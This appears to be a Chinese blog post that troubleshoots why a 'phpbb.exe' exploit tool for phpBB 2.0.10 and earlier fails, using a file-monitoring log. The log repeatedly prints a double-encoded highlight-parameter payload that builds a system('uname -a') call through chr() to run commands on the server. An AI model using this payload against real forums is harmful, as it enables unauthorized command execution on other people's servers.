下午有个网友问我,他在执行phpbb.exe对<=2.0.10进行攻击时总是提示错误,报错内容为“Run-time error '53' File not found”。截图如下:
因为只是看过相关漏洞介绍和一个perl的源程序,对于他说的phpbb.exe倒是没用过,只好先找一个看看。在我机器没有问题,初步估计可能是他的机器上缺少vb库或者控件什么的。然后反汇编找找,没什么特别的;dllshow也没发现特别的,基本都是系统自带的。
还真是有意思了,找了个同事帮忙试试,居然也不行!在他机器上找个文件操作监控工具,_blank>http://www.coolersky.com/web/download/20041208180854.asp,监控一下phpbb,看他执行读取了些什么,前面的基本没什么特别的,当我看到这里的时候,基本发现了问题:
16:41:06 phpBB.exe:996 IRP_MJ_CREATE C:\Program FILE NOT FOUND
Attributes: Any Options: Open
16:41:06 phpBB.exe:996 IRP_MJ_CREATE C:\Program.exe FILE NOT FOUND
Attributes: Any Options: Open
16:41:06 phpBB.exe:996 IRP_MJ_CREATE C:\Program FILE NOT FOUND
Attributes: N Options: Open
16:41:06 phpBB.exe:996 IRP_MJ_CREATE C:\Program FILE NOT FOUND
Attributes: N Options: Open
16:41:06 phpBB.exe:996 IRP_MJ_CREATE C:\Program Files\Internet FILE NOT FOUND
Attributes: Any Options: Open
16:41:06 phpBB.exe:996 IRP_MJ_CREATE C:\Program Files\Internet.exe FILE NOT FOUND
Attributes: Any Options: Open
16:41:06 phpBB.exe:996 IRP_MJ_CREATE C:\Program Files\Internet FILE NOT FOUND
Attributes: N Options: Open
16:41:06 phpBB.exe:996 IRP_MJ_CREATE C:\Program Files\Internet FILE NOT FOUND
Attributes: N Options: Open
16:41:06 phpBB.exe:996 IRP_MJ_CREATE C:\Program Files\Internet Explorer\
Iexplore.exe FILE NOT FOUND Attributes: Any Options: Open
16:41:06 phpBB.exe:996 IRP_MJ_CREATE C:\Program Files\Internet Explorer\
Iexplore.exe.exe FILE NOT FOUND Attributes: Any Options: Open
16:41:06 phpBB.exe:996 IRP_MJ_CREATE C:\Program Files\Internet Explorer\
Iexplore.exe FILE NOT FOUND Attributes: N Options: Open
16:41:06 phpBB.exe:996 IRP_MJ_CREATE C:\Program Files\Internet Explorer\
Iexplore.exe FILE NOT FOUND Attributes: N Options: Open
16:41:06 phpBB.exe:996 IRP_MJ_CREATE C:\Program Files\Internet Explorer\Iexplore.exe
http:\www.site.com\phpBB\viewtopic.php?t=1&highlight=%2527%252esystem(chr(117)%252echr(110)
%252echr(97)%252echr(109)%252echr(101)%252echr(32)%252echr(45)%252echr(97))%252e%2527
NAME INVALID Attributes: Any Options: Open
16:41:06 phpBB.exe:996 IRP_MJ_CREATE C:\Program Files\Internet Explorer\Iexplore.exe
http:\www.site.com\phpBB\viewtopic.php?t=1&highlight=%2527%252esystem(chr(117)%252echr(110)
%252echr(97)%252echr(109)%252echr(101)%252echr(32)%252echr(45)%252echr(97))%252e%2527.exe
NAME INVALID Attributes: Any Options: Open
16:41:06 phpBB.exe:996 IRP_MJ_CREATE C:\Program Files\Internet Explorer\Iexplore.exe
http:\www.site.com\phpBB\viewtopic.php?t=1&highlight=%2527%252esystem(chr(117)%252echr(110)
%252echr(97)%252echr(109)%252echr(101)%252echr(32)%252echr(45)%252echr(97))%252e%2527
NAME INVALID Attributes: N Options: Open